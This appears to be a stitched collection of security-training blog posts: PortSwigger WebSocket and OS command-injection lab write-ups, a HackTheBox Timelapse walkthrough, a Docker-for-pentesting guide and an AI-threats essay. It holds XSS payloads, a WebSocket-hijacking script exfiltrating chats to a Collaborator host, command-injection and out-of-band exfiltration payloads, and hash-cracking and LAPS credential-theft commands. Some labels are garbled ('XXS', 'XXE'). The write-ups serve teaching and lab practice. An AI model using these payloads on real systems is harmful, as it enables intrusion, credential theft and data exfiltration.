On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

Go to Burp suite and click on “WebSocket history” under Proxy tab. Here we will find all the WebSocket requests and responses that were exchanged between client and server. Let us search for a message request that we sent to the server and send that request to the repeater.

Let’s switch to the repeater tab and change the value of the message to a malicious JavaScript payload which should generate an alert() on the support agent’s browser who is communicating with us. Here is the payload to trigger alert():

<img src=x onerror=alert(“CyberiumX”)>

Send the request which will trigger this payload on the browser of the support agent.

So this is how we can manipulate the WebSocket messages to trigger XXS. This will solve the lab as well.

Lab-2 Manipulating the WebSocket handshake to exploit vulnerabilities

Only by interfering with the WebSocket handshake may some WebSocket vulnerabilities be discovered and taken advantage of. These vulnerabilities frequently entail design errors, such as improper reliance on HTTP headers like the X-Forwarded-For header to make security determinations. Let’s dive into and find how to perform it.

Access the lab and open Burp Suite Community edition in order to identify XXE vulnerability.

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

<img src=x onerror=alert(“CyberiumX”)>

Send the request. We will find that the attack has been detected due to an aggressive XXS filter implemented server side.

Also, we will find that the connection has been disconnected. So we need to reconnect with the server by clicking on the Reconnect option.

It will open another window where we can see our reconnect request as well as the response received from the server. Let us click on Response and will find that our IP address has been blacklisted or blocked which means we cannot reconnect with the server using our IP.

We have a header which might help us out here if it is supported by the server. The header is “X-Forwarded-For” which helps us to change our IP to whatever we will provide as a value to this header. So let’s add a header as follows:

X-Forwarded-For: 1

Click on Connect.

We will find that we are again connected with the server. Now we will again make some changes in the payload and try the same steps again if we are disconnected again.

Finally, after trying some XXS payloads, the following payload worked:

<iMG Src=x oNeRRor=alert`“CyberiumX”`>

So, this is how we can manipulate WebSocket handshakes to exploit XXS vulnerability. This will solve the lab as well.

Lab-3 Cross-site WebSocket hijacking

Cross-site request forgery (CSRF) vulnerability on a WebSocket handshake is what causes cross-site WebSocket hijacking, also referred to as cross-origin WebSocket hijacking. It occurs when the WebSocket handshake request does not contain any CSRF tokens or other unpredictable information and instead entirely depends on HTTP cookies to handle sessions. So let’s find out how we can exploit it.

Access the lab and open Burp Suite Professional in order to identify XXE vulnerability. Our webpage will open in a while.

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

Go to Burp suite and click on “HTTP history” under the Proxy tab. Search for a GET request to /chat endpoint and right click on the request and click on Copy URL.

Now open the exploit server and in the body section type the following code:

<script>

    var ws = new WebSocket(‘wss://websocket_url’);

    ws.onopen = function() {

        ws.send(“READY”);

    };

    ws.onmessage = function(event) {

        fetch(‘https://Burp_collaborator_url’, {method: ‘POST’, mode: ‘no-cors’, body: event.data});

    };

</script>

In place of websocket_url, paste the copied URL. Remember to remove https:// from the copied URL. Now, let us open Burp Collaborator, copy the subdomain of collaborator and paste the URL in place of Burp_collaborator_url.

Store the payload and click on “Deliver exploit to victim”.

Now, switch to Burp Collaborator window and click on “Poll now”. We will find some interaction with our collaborator subdomain. Let us check the HTTP requests by clicking on each HTTP request and then clicking on “Request to Collaborator”.

We will find a POST request and in the body of which we will find the chats of our victim in JSON format. Now let’s look for the chat where the support agent has provided the password for the victim user. We also got the username of Victim as “Carlos”.

Now copy the Password, go to the “My account” page and login as carlos with the help of the copied password. We will find that we are logged in successfully and the lab is also solved.

This is how we can identify and exploit WebSocket related vulnerabilities.

You can check out our other writeup blogs on PortSwigger’s labs here.

Happy Pentesting!!!

Team CyberiumX

AI-Driven Cyber threats and Defenses

Introduction

The fusion of Artificial Intelligence (AI) and Cyber Security resulted in a new era of cyber threats and defense mechanisms in the quickly changing digital landscape. AI-driven cyberattacks are getting more and more sophisticated, launching targeted and evasive attacks by utilizing the huge capabilities of machine learning algorithms. In order to prevent and adapt to these new attacks, Cyber Security experts are simultaneously utilizing AI to create improved defense techniques. This extensive blog covers the cutting-edge strategies used to defend our digital infrastructure against these threats and digs deeper into the intricacies of AI-driven cyber attacks.

AI’s Increase in Cyberattacks

The widespread use of AI technology has given cybercriminals a potent ally in their efforts to compromise security measures. The following essential elements, which are at the heart of AI-driven cyberattacks, fuel a variety of malicious strategies:

Automated phishing campaigns use data analysis to create personalised, persuasive emails that are tailored to specific consumers. As a result of these efforts’ utilisation of users’ private information and preferences, the possibility of successful infiltration has greatly increased.

Cybercriminals use hostile machine learning (ML) approaches to trick AI-based security systems. They can get beyond the safeguards and get unauthorized access to systems by quietly modifying inputs.

Zero-Day Exploits: AI algorithms are quick to spot weaknesses in software and systems that have not yet been discovered. Zero-day exploits have resulted from this, which are very sophisticated and challenging to find using standard security procedures.

Malware produced by AI is polymorphic, continually changing and adapting its code to elude detection by signature-based systems. It is difficult to recognize and defend against such dangers because of their dynamic nature.

The Risks of Cyberattacks Driven by AI

AI-driven cyber attacks are a serious threat to everyone, including governments, businesses, and individuals. Their effectiveness is influenced by the following elements:

Cyber attackers may execute campaigns at previously unheard-of speeds and on an enormous scale thanks to AI. This power overwhelms conventional security infrastructure, which makes detection and reaction more difficult.

AI-powered attacks have the capacity to learn from the results of their activities, which enables them to quickly adapt and evolve. They become more resistant to static defense mechanisms as a result.

Evasion Techniques: AI-driven attacks can avoid detection by imitating legal user behaviour and blending in with regular network traffic. They are more difficult to recognize and defeat because of their deceitful strategy.

Attackers can affect AI models by data poisoning, which involves providing them with inaccurate or malicious data. AI defenses can become ineffective as a result of this manipulation, which can result in erroneous decisions and actions.

Cyber Security defense Powered by AI

Cyber Security experts are looking to AI as a critical tool for bolstering defenses and improving incident response capabilities in the face of these changing threats. To use AI in Cyber Security defense, several strategies are being used:

Behavioural Analysis: AI-driven security systems continuously track and examine system activity, network traffic, and user behaviour. These systems can quickly identify possible risks by spotting deviations from known patterns, anomalies, or suspicious activity.

Threat Intelligence and Predictive Analysis: Artificial intelligence (AI) systems are essential for collecting and analyzing enormous amounts of threat intelligence data from multiple sources. This makes it possible for organizations to anticipate and actively counteract new hazards before they manifest.

Adaptive Security Measures: AI-driven defenses are capable of dynamically modifying security rules and parameters in response to changing threat landscapes. Defense mechanisms are kept effective against new threats thanks to this adaptability.

Using Natural Language Processing (NLP) to Spot Phishing: To detect phishing attempts, NLP algorithms powered by AI examine the content of emails and other communications. As a result, there is a lower chance that employees may experience such assaults.

The Cyber Security field is embracing collaborative AI technologies that make it easier for enterprises to share threat intelligence and analysis. This team effort improves overall defense capabilities and facilitates quicker reaction times.

Ethical Aspects of AI-Powered Cyber Security

Ethics are more important than ever as AI becomes a crucial component of Cyber Security. Due to the substantial data gathering and monitoring needed for AI-powered protection, privacy concerns are raised. To maintain ethical operations in the industry, the proper balance between strong security and protecting individual privacy must be struck.

Conclusion

The terrain of cyberwar has been permanently changed by the fusion of AI and Cyber Security. The challenges posed by AI-driven cyber attacks are always changing as they take advantage of AI’s speed, adaptability, and evasion strategies to get past defenses. But AI also gives security experts the ability to create more sophisticated and adaptable protection procedures, ushering in a new era of Cyber Security defense. We can all improve our digital resilience and protect the future of our linked planet by utilizing AI’s potential while upholding ethical standards. We can only keep ahead of the continuously changing threat landscape via constant innovation, cooperation, and an uncompromising dedication to security.

You can check out our other blogs here.

Stay Safe !!!

Team CyberiumX

Penetration Testing using Docker

Overview of Docker

An open-source program named Docker is used to build, distribute, and operate applications in containers, which are loosely segregated environments. Containers can communicate with one another through well-defined channels even while they are physically separated from one another. Containerized applications keep their security.

Docker, which is somewhat similar to virtual machines, enables apps to run on the same Linux kernel as the system they are installed on. The host computer is where applications are shipped, which improves performance and reduces application size.

Who Uses Docker?

System administrators and developers both use Docker to deploy and run distributed applications. It provides tools for easing DevOps by enabling developers to generate templates known as images that can be used to create portable virtual machines known as containers that include their apps and all of their dependencies. These portable virtual machines can be set up and used by system administrators in both development and production settings.

Architecture of Docker

Docker manages and creates Docker containers based on Linux containers using a client-server architecture and a remote API. Docker images are the components of Docker containers. The connection between containers and images is comparable to how objects and classes are connected in object-oriented programming.

Docker’s Client

Docker clients allow the users to interact with Docker. The dockerd daemon receives a command from the docker client and executes it. Docker commands uses the Docker API to perform this communication. The Docker client may interact with many docker daemons.

Docker Host

A complete environment for installing and running programs is provided by the Docker host. The Docker daemon, along with Images, Containers, Networks, and Storage, make up this system. As was indicated before, the daemon, which is in charge of all container-related tasks, accepts commands via the CLI or the REST API. To manage its services, it can also communicate with other daemons.

Docker’s Registry

The services known as Docker registries basically lets you store and download images. In other words, a Docker registry is a group of Docker repositories that each contain one or more Docker Images. A couple of the Public Registries’ components include Docker Hub and Docker Cloud. Another choice is private registries. The three most often used commands when working with registries are docker push, docker pull, and docker run.

Installation of Docker

Linux users can quickly install Docker by launching the terminal and typing the following command:

apt install docker.io

In addition, we can use the help command to get more information about all the choices that Docker offers.

docker –help

After your Docker container has been running for a while, you can execute or retrieve any image from it. We’ll now take a look at the docker-based penetration testing infrastructure used by pen testers.

Docker for Penetration Tester

Given that it creates an environment for penetration testers and makes installation and configuration simple, Docker is crucial for penetration testing. Using a Docker container, we can deploy essential penetration testing tools like:

Metasploit Framework

Sqlmap

Kali Linux

Parrot OS

Run Metasploit Framework as a Docker Container

We are all aware that the powerful open-source penetration testing program known as Metasploit Framework exists. Without having to install it on our computer, we may run the Metasploit Framework inside of a Docker container.

Use the following command to download the Metasploit docker image to our computer:

docker pull metasploitframework/metasploit-framework

To run the Metasploit Docker file, simply execute the following command:

docker run –rm -it -p 443:443 -v ${PWD}:/root/.msf4 metasploitframework/metasploit-framework

Metasploit is now prepared to exploit the flaws. We may use the same commands we used to use Metasploit on other systems.

Removing docker images

If we need to remove the installed docker images, we can use the following commands:

To list all the docker images which are installed on the machine:

docker images

Now in order to remove the image, we need image_id which we can get with the above command and then use the following:

docker rmi <image_id>

docker images

Similar to this, we can install other tools using the proper commands and then configure them for simpler use. The installation and configuration processes utilizing a docker container are relatively quick, enhancing the productivity of penetration testers.

Run SQLmap as a Docker Container

SQLmap is an important penetration testing tool used to test websites against different types of SQL injection vulnerabilities. It is an open source tool used to automate the process of identifying and exploiting SQL injection vulnerabilities. We can simply use Docker to run SQLmap using the following commands:

If we do not know the name of the image of any Docker container, we can simply use “search” command in order to find the name of image as follows:

docker search sqlmap

This will provide us the images related to sqlmap. We can install any image with the help of the image name using the following command:

docker pull googlesky/sqlmap

After successfully pulling the image from Docker, we can run the SQLmap using the following command:

docker run -it googlesky/sqlmap

So, we can simply run SQLmap and its different options with the help of above command and exploit SQL related vulnerabilities.

Run Kali Linux as a Docker Container

Kali Linux is the best and user friendly Operating System for Penetration testing based on Debian distribution of Linux. Its environment can be deployed as a Docker image on any operating system using the following command:

docker pull kalilinux/kali-rolling

After pulling the Kali Linux image, we can simply run the Kali environment using the following command:

docker run -it kalilinux/kali-rolling

Run Parrot OS as a Docker Container

Another powerful Operating System which security researchers or penetration testers uses is Parrot OS which is a Debian based Linux distribution. We can use the Parrot OS environment on any Operating system using docker command as follows:

docker pull parrotsec/security

After successfully installing/pulling the Parrot OS image, we can simply run it using the following command:

docker run -it parrotsec/security

There are other tools which you can run using Docker for better performance and simply remove them.

By incorporating Docker into penetration testing procedures, testers may easily simulate a variety of environments, improving the efficiency and effectiveness of their evaluations. Utilizing Docker for penetration testing is still an effective method for strengthening digital assets and establishing a strong defense against contemporary cyber threats as long as security concerns exist.

You can check out our other blogs here.

Happy Pentesting!!

Team CyberiumX

HackTheBox- Timelapse

Hello folks,

This blog focuses on a machine called “Timelapse” within HackTheBox. It has been classified as an easy machine. It is based on the Windows Operating System. You will be learning about Windows Enumeration and Privilege Escalation. Let’s proceed without any delay and begin the penetration testing process.

You can find the machine in the retired category of HackTheBox over here.

First of all let’s start the machine by clicking on “Join Machine” and scan the obtained IP using “NMAP”.

sudo nmap -sS <Machine_IP>

We can see that there are many ports open such as DNS (53), Kerberos (88), LDAP (389), SMB (445), etc. which confirms that this machine is a Domain controller in an Active Directory environment. Let us move further and start the enumeration process with SMB.

Firstly, we will see the available shares and their permissions with the help of smbmap tool using the following command.

smbmap -H <Machine_IP> -u “CyberiumX”

Here, I have provided any username like CyberiumX which will be treated as a guest account. We get an available share with Read permission named “Shares”

After that we can use smbclient to connect with the available share.

smbclient \\\\<Machine_IP>\\Shares

Now, we will check what content we have here on the “Shares” share using dir command. We will find some directories here, so let us visit them one by one and look for some critical files. After looking into the Dev directory we found a file named winrm_backup.zip which looks very interesting. Let’s download it using following command and look for some other important files:

get winrm_backup.zip

We got nothing special in the other directory, so let us exit from here and try to unzip the compressed file using the following command:

unzip winrm_backup.zip

We will find that there is a pfx file inside the zip file but we cannot decompress it because it requires a password. So in order to get the password of it we need to generate the password hash out of the zip file using zip2john tool as follows:

zip2john winrm_backup.zip > zip_password.txt

We have the password hash of the zip file. Now we can simply use john the ripper on our zip_password.txt file which contains the hash of the zip file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt zip_password.txt

And then we can simply decompress the file with the password we just obtained using the following command:

unzip winrm_backup.zip

It will decompress a file with the name “legacyy_dev_auth.pfx”. Here legacyy or legacyy_dev looks like a username.

Getting Foothold on Timelapse

Now using the pfx file we can generate .pem and .crt files which will help us to take access to the Windows machine using WinRM. In order to generate the pem file, we can simply use the following command: (This will require a password that we do not know. Let us check.)

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

We got an error as invalid password as we do not have access to the password of the pfx file.

Now we need to get the password hash of the pfx file using a tool named pfx2john. This tool is located at /usr/share/john. In order to get the hash, we need to copy the pfx file to /usr/share/john and then we need to run the following command:

sudo ./pfx2john.py legacyy_dev_auth.pfx > /home/CyberiumX/pfx_hash.txt

This will provide us with the hash of the pfx file. Now, we will again use john the ripper tool to get the password of the pfx file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt

John the ripper successfully provided us the password of pfx file and now we can finally generate pem file using the same command as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

It asked for a pass phrase which we can set of our choice.

Next, we will generate the crt file using the same tool openssl and pfx file as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out CyberiumX_cert.crt

We can see that we have both the files here.

Now we have to generate a pem file with RSA asymmetric encryption signature because it will be used to take the remote shell using WinRM. So, we will use the following command to create it:

openssl rsa -in CyberiumX_key.pem -out CyberiumX_rsa.pem

Okay. So, now after everything we have done we will use Evilwinrm tool to get the remote access of the target machine. We will provide Machine’s IP, username as legacy, CyberiumX_rsa.pem as Key file with RSA signature and CyberiumX_cert.crt as our certificate file as follows:

evil-winrm -i <Machine_IP> -u legacyy -k CyberiumX_rsa.pem -c CyberiumX_cert.crt –S

Great!!! We got our foothold on Timelapse. We can go to User’s Desktop and look for User.txt file.

Now after trying different methods to escalate the privileges, we found password for a user named svc_deploy in the history of Powershell using following command:

cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Let’s take the access of svc_deploy user on Timelapse using Evilwinrm tool as follows:

evil-winrm –I <Machine_IP> -u svc_deploy -p ‘<password>’ -S

Privilege Escalation on Timelapse

Now, we need to find our way to get Administrative access on Timelapse.
In the Documents folder of svc_deploy user, we are getting a directory named AdmPwd.PS.

So, I researched this directory on Google and heard about LAPS (Local Administrator Password Solution) which provides a solution to manage local account passwords of domain joined computers. Hence the name of machine is Time-LAPS

You can check out the article by HackTricks about LAPS Penetration Testing.
Now let us check if the following registry is set or not:

reg query “HKLM\Software\Policies\Microsoft Services\AdmPwd” /v AdmPwdEnable

This is set on the target machine. Let us confirm that is there any group related to LAPS using the following command:

net groups /domain

So, we have a group named LAPS_Readers which is a domain group.
Now let us finally confirm whether we are a member of this group using the following command:

net groups “LAPS_Readers” /domain

Great!!! We are a member of this group. Now we need to find a way to get the password of Administrator users using LAPS.
After searching a lot on the internet I finally found one command which requires the name of the DC as an argument. So let’s first get the name of DC using the following command:

Get-AdDomainController

We will find that the name of the DC is dc01. So using this name we can now run our final command which will extract the password for the admin user and show it to us on the screen. The command is as follows:

Get-ADComputer dc01 -Properties ms-Mcs-AdmPwd

Hurray!!! We got the password of the administrator user. Let us again use evilwinrm tool to get access to the administrator user using the looted credentials. The command is as follows:

evil-winrm -i <Machine_IP> -u administrator -p ‘<password>’ –S

Yeah!!! We have administrative access here. Now we need to read the contents of root.txt file which we could not find in the Administrator directory. So I checked the Users folder and there we have another user named TRX. So, I checked the Desktop of the TRX user and there I found the root.txt file which we can read with the help of the type command.

So, this was all about the Timelapse machine by HackTheBox. We learned about some new terms here like How to get the password hash of a pfx file and how to crack it, how to get access using key and crt files, about LAPS, etc.

You can checkout out other blogs on HackTheBox machines here.

Happy Pentesting!!!

Team CyberiumX

Portswigger- Command Injection Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit Command Injection vulnerabilities on websites. This is also known as OS Command Injection vulnerability. In this blog, I will be providing a detailed walkthrough of all PortSwigger’s Lab. I am assuming that you guys have basic knowledge of Linux and Windows Operators.

You can check out the Portswigger’s labs for Command Injection vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Lab 1- OS command injection, simple case

In this lab scenario, we will be looking at a simple case of Command Injection without any defense in place. The rule 1 in order to exploit this vulnerability is to look for GET and POST parameters on the website. After that, we will simply try to execute OS commands using different operators used on Windows and Linux Operating systems.

Let’s access the lab. We will require the Burp Suite Community edition here.

There are many products available on the home page of the website. We can click on the “View details” button of any product and find that there is a “Check Stock” feature available on the webpage. Let us click on it.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/product/stock” endpoint. Take the request to repeater.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter starting from productId parameter:

& whoami &

After typing the above payload, select the payload and press Ctrl + u to URL encode the whole payload.

+%26+whoami+%26+

Let me explain this payload to you guys. We want to run the “whoami” command, so in order to execute it we provided a URL encoded & operator (%26), one in the beginning and another one in the end. The reason for using & operator is to execute the previous process in the background and then execute the next command. Also, the URL encoding of space is +.

Simply send the request from Burp Repeater.

We will get the output of whoami command in the response which confirms that this parameter is vulnerable to command injection vulnerability. This will solve the lab.

Lab 2- Blind OS command injection with time delays

In this scenario, we will be understanding what Blind Command Injection vulnerability is and what are the possible ways through which we can identify and exploit it? Blind means that you will not get the output of any command in the response but you can still exploit it using various methods. So, first of all we will be identifying blind command injection vulnerability by generating time delays.

Let’s access the lab. We will require the Burp Suite Community edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Over here, we can provide feedback to the website by submitting a feedback form which has four parameters: Name, Email, Subject and Message. Let us fill the form with any random values and click on the “Submit feedback” button. You will get a message on the web page “Thank you for submitting feedback!”

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

& ping –c 10 127.0.0.1 &

After typing the above payload, select the payload and press Ctrl + u to URL encode whole payload.

+%26+ping+-c+10+127.0.0.1+%26+

Let me explain this payload to you guys. We want to run “ping” command so that we can confirm that the web application is waiting for the command to completely execute and then bring back the response to us. The IP that we have used here is called a Loopback address which is its own interface. In the response, we will not get any output (blind). Hence this will cause a time delay which will help us to confirm blind command injection vulnerability on the parameter. Now, in order to execute it, we provided URL encoded “&” operator (%26), one in the beginning and another one in the end. The reason for using “&” operator is to execute the previous process in the background and then execute the next command. Also, URL encoding of space is +.

Firstly, let us use the above payload on the Name parameter

Simply send the request from Burp Repeater.

You will find that you are getting the response immediately which confirms that the parameter is not vulnerable. Now, try the same payload on Email parameter. Simply send the request from Burp Repeater.

This time you will find that we got the response after 6 seconds which we can confirm from the bottom right corner.

So, we got our vulnerable parameters but this must not have solved the lab because in order to solve it we need 10 seconds time delay.

Let us create another payload where we will increase the number of ping packets to 12 as follows:

+%26+ping+-c+12+127.0.0.1+%26+

Again, let’s send the request from Burp Repeater.

This time we can see that we got the time delay of more than 10 seconds.

There is another command that I would like to discuss here. “Sleep” command allows you to wait for the number of seconds we specified in the command and it will also generate the time delay. Let us try it.

+%26+sleep+10+%26+

Again, let’s send the request from Burp Repeater.

You will again find that we got the delay of exactly around 10 seconds which will help you to solve the lab.

Lab 3- Blind OS command injection with output redirection

In this scenario, we will be learning about how we can exploit blind command injection vulnerability by simply redirecting the output of any command into a file which we can easily access on the target website. Let’s see it in action.

Let’s access the lab. We will require the Burp Suite Community edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

+%26+ping+-c+10+127.0.0.1+%26+

It is the same payload that we used in the previous lab to confirm that the parameter is vulnerable to blind command injection vulnerability. Let us directly try the payload on email parameter.

Send the request from Burp Repeater.

We can confirm that the parameter is vulnerable as we got the time delay of around 9 seconds. Great! Let us now change the payload and try to redirect the output of whoami command to any file which we can create in /var/www/images. This location is already provided to us in the lab description. Now the payload will look like the following:

+%26+whoami+>+/var/www/images/a.txt+%26+

Here we are executing the whoami command and then redirecting the output to a file named a.txt using (>) operator which is then stored in the provided location.

Now simply we need to find an image on the webpage and replace the name of the image with our filename and see if it is allowing us to get the command output.

Let’s replace the filename with a.txt and hit enter. We will find that we are getting the output of the whoami command.

This will solve the lab.

Lab 4- Blind OS command injection with out-of-band interaction

In this scenario, we will learn about exploiting blind command injection vulnerability using OAST techniques. We can check if the parameter is vulnerable by using commands like ping or nslookup to send a request to a domain that we control. So, we need to use Burp Collaborator. Let us see how to exploit it.

Let’s access the lab. We will require the Burp Suite Professional edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Now in order to use OAST techniques, we need a Burp Collaborator. So, we will open it and copy the Collaborator’s subdomain by clicking on “Copy to Clipboard”.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

+%26+ping+BURP_COLLABORATOR_SUBDOMAIN+%26+

Here, we are simply trying to ping the collaborator’s subdomain to confirm that if we receive any DNS requests on our Collaborator window then the parameter is vulnerable. Let us directly try the payload on email parameters.

Send the request from Burp Repeater.

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will find that we received some interaction with subdomain which confirms that the email parameter is vulnerable to blind command injection vulnerability.

We can also use nslookup to send DNS requests to the subdomain using the following payload:

+%26+nslookup+BURP_COLLABORATOR_SUBDOMAIN+%26+

Send the request from Burp Repeater.

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will again find that we received some interaction with the subdomain. Hence it will solve the lab also.

Lab 5- Blind OS command injection with out-of-band data exfiltration

In the final scenario, we will learn how we can exfiltrate data using OAST techniques. We will use Burp Collaborator’s subdomain to get (exfiltrate) the output of any command. Let us begin the process.

Let’s access the lab. We will require Burp Suite Professional edition here.

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

Now in order to use OAST techniques, we need a Burp Collaborator. So, we will open it and copy the Collaborator’s subdomain by clicking on “Copy to Clipboard”.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

+%26+ping+`whoami`.BURP_COLLABORATOR_SUBDOMAIN+%26+

Here, we are simply trying to use a command whoami as a subdomain of collaborator’s domain and using ping command to confirm that if we receive any DNS requests on our Collaborator window then the parameter is vulnerable and it will contain the output of whoami command. Let us directly try the payload on email parameter.

Send the request from Burp Repeater.

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will find that we received some interaction with subdomain which confirms that the email parameter is vulnerable to blind command injection vulnerability. If we click on any DNS request, we will find the output of whoami command as a subdomain of the collaborator’s domain name.

We can submit the output of the whoami command and this will solve the lab.

We have discovered many ways to identify and exploit Command Injection Vulnerabilities.

You can also check out our other PortSwigger blogs here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe | Answers For The Threat Modelling

Task 1- Introduction

Task 2- Threat Modelling Overview

Task 3- Modelling with MITRE ATT&CK

Task 4- Mapping with ATT&CK Navigator

Task 5- DREAD Framework

Task 6 STRIDE Framework

Task 7- PASTA Framework

Lab-1 Remote code execution via web shell upload

Lab-2 Web shell upload via Content-Type restriction bypass

Lab-3 Web shell upload via path traversal

Lab-4 Web shell upload via extension blacklist bypass

Lab-5 Web shell upload via obfuscated file extension

Lab-6 Remote code execution via polyglot web shell upload

Lab-7 Web shell upload via race condition

Introduction

What is Cybercrime?

Top Common Types of Cybercrimes

Impersonation/Identity Theft

Child pornography

SIM swap scams

Website defacement

Phishing Attacks

Cyberstalking

Data breach

Cybersquatting

Cyberbullying

Online Sextortion

Malware and Ransomware

Impact of Cybercrimes

Prevention and Mitigation Strategies

Conclusion

Finding API Key on Grep

Finding First Flag on Grep

Getting Foothold on Grep

Finding Email of Admin on Grep

Finding another Domain on Grep

Finding Admin’s Password on Grep

Finding First Flag on Ra

Finding Second Flag on Ra

Finding Third Flag on Ra

Lab-1 Manipulating WebSocket messages to exploit vulnerabilities

Lab-2 Manipulating the WebSocket handshake to exploit vulnerabilities

Lab-3 Cross-site WebSocket hijacking

Introduction

AI’s Increase in Cyberattacks

The Risks of Cyberattacks Driven by AI

Cyber Security defense Powered by AI

Ethical Aspects of AI-Powered Cyber Security

Conclusion

Overview of Docker

Who Uses Docker?

Architecture of Docker

Installation of Docker

Docker for Penetration Tester

Run Metasploit Framework as a Docker Container

Removing docker images

Run SQLmap as a Docker Container

Run Kali Linux as a Docker Container

Run Parrot OS as a Docker Container

Getting Foothold on Timelapse

Privilege Escalation on Timelapse

Lab 1- OS command injection, simple case

Lab 2- Blind OS command injection with time delays

Lab 3- Blind OS command injection with output redirection

+%26+whoami+>+/var/www/images/a.txt+%26+

Lab 4- Blind OS command injection with out-of-band interaction

Lab 5- Blind OS command injection with out-of-band data exfiltration

Book a Demo